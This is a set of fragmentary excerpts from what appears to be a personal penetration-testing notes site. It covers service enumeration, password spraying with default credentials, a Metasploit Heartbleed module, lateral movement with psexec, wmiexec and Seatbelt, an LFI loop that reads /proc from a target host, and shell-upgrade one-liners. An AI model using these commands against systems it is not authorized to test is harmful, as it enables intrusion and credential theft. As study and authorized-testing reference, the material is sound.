Enumeration
Mandatory:
Try to access: ssh -v $target
Optional:
Reuse existing credentials.
Brute-force with existing usernames (password spraying).
Try ssh-audit $target
Try known usernames with the username as password, or other found strings.
Privilege Escalation
Find the .ssh directory on the file system and check all files within.
Check the sshd_config file.
Check the SSH version for exploits.
Enumeration
Check the certificate.
Perform an SSL scan.
Go to Checklist 80 HTTP.
Optional:
If vulnerable to Heartbleed, use msf> use openssl_heartbleed. Don’t forget to use set ACTION KEYS or similar (see info).
Enumeration
Mandatory:
Check anonymous login.
Try to create AND upload a file:
mkdir test
put /tmp/test test
Check login with at least the following credentials:
admin / admin
admin / password
Optional:
Download everything with wget and look for dot files!
Check login with newly found users.
Brute-force login. Make sure to check admin / admin and other usual combinations…
Each installation has the following directory structure:
/document root
/_vti_bin    shtml.exe
/_vti_adm    admin.exe
/_vti_aut    author.exe
shtml.exe is for executing a web browser guest’s code for a web page; author.exe and admin.exe are not.
Tools
Sparty: FrontPage security audit tool.
Enumeration
Mandatory:
Open the site in a browser. Maybe a CUPS interface is available.
Perform nmap -p 631 $target --script cups-info
Try PRET (Printer Exploitation Toolkit), which is useful for printer hacking. See also HTB Laser (ippsec).
python pret.py $target pcl
Checkout a repo: svn checkout svn://...
Show log: svn log
Show info: svn info
Show all branches: svn ls svn://$victim --verbose
The first number from the previous command shows the revision. To see the content of a repo for another revision, add the -r flag:
svn ls svn://$victim --verbose -r 1
svn ls svn://$victim --verbose -r 2…
This site contains links to tools / techniques which can run in the background during an engagement.
Linux
Windows
responder: Listen with responder on a network and wait for AD systems to ask for a DC. This can reveal an NTLM hash. (Source)
Start responder on your own system:
sudo responder -I tun0 --wpad
Connect from the target system to this system via SMB, in the Windows Explorer or on the command line via dir…
Main concepts:
Tenant: The “space” which an organization “rents”. Has a name.
Users
Groups
Applications
Identity model
Cloud only: Accounts exist only in foreign systems (“cloud”).
Synchronized: Accounts are created and managed on-premise and synchronized to foreign systems (“cloud”).
Federated: Accounts are created, managed and authenticated on-premise; foreign systems (“cloud”) also check against an on-premise system.…
With username/password
With psexec (Prerequisites: the ADMIN$ share is available, the user is part of the local administrator group on the target)
With psexec via Metasploit: use exploit/windows/smb/psexec
With atexec (Impacket): atexec.py dom/user:pass@$target cmd.exe
With wmiexec: wmiexec.py domain.local/$target:$password@$ip
With Smbmap: smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target
With Wmic (To run a…
Automates Windows enumeration. Github page
Usage
Seatbelt.exe -group=all
Run Seatbelt.exe without arguments to see possible parameters.
Example
Seatbelt.exe OSInfo Processes
Remote
From another Windows system, Seatbelt can connect to a victim and perform commands there.
Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber
Command aggregation
There are already some groups defined which perform multiple tests at once.
Seatbelt.exe -group=system [-computername=...]
Seatbelt.exe…
Source on Github
Creates screenshots from a list of URLs. A good way to get a fast overview of a new site.
With nmap, use -oA file to also save the output as an XML file. EyeWitness can read this file via -x file and take screenshots of all of these sites.
EyeWitness.py --web -x webservers.xml
The usual order
Network scan
Detect hosts for a domain (use SecLists):
for ip in $(cat common-subdomains.txt); do host $ip.megacorpone.com; done
Reverse lookup: Find domains for addresses:
for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found"
Zonefile enumeration
Grab the zonefile from a random target domain:
host -a -l fraunhofer.de ns3.fraunhofer.de…
          Vulnerability Assessment    Pentest
Focus     All vulnerabilities         Only exploitable vulnerabilities
Depth     On the surface only         On multiple layers (incl. pivoting)
Risk      Estimated                   Enables a better estimation, due to the combination of vulnerabilities
For reverse engineering
Device name            Content
/proc/$pid/maps        Shows the memory mapping of a process. Includes all used libraries.
/proc/self/loginuid    Own UID.
Read processes
If you can read /proc via an LFI:
#!/bin/bash
# Fetch the command line of every PID from 1 to 1024 through the LFI
mkdir -p /tmp/proc   # curl --output needs the target directory to exist
for i in {1..1024}; do
  echo $i
  curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i
done
Then, look in the /tmp/proc directory for files > 0 bytes (a PID that does not exist yields an empty file).
Read environment of…
Use profiles: See https://github.com/eon01/AWS-CheatSheet for many commands or https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/
General
Get info about the currently used profile:
aws [--profile $profile] sts get-caller-identity
Another way to obtain an ARN (with account ID) is to call a non-existent function and extract the data from the error message.
EC2
List all EC2 images (AMIs):
aws [--profile $profile] ec2…
The DPAPI is a Windows system which stores passwords bound to the local system. In the user directory, the keys are stored in the AppData\Roaming\Microsoft\Protect\<SID> directory. From the user’s password, a master key is derived. When the user changes their password, a new master key is generated as well — and all old master…
Try these resources if you can access files but not list them. http://pwnwiki.io/#!presence/windows/blind.md Cheat sheet 1 List
In Apache and probably other systems you can “travel over” non-existing files, because the path is shortened before the existence of a file is checked. Example: /test/test.txt/../../index.html will return the root’s index.html in Apache even if the test directory and…
This is how a PDF document looks — with a JavaScript execution. Note that with OpenAction 6 (object block 6) this block is executed when the document is opened.
Another way to create a malicious PDF:
Analyse a PDF file
If a PDF file is compressed, decompress it first:
pdftk input.pdf output output.pdf uncompress
Get details with pdfinfo…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';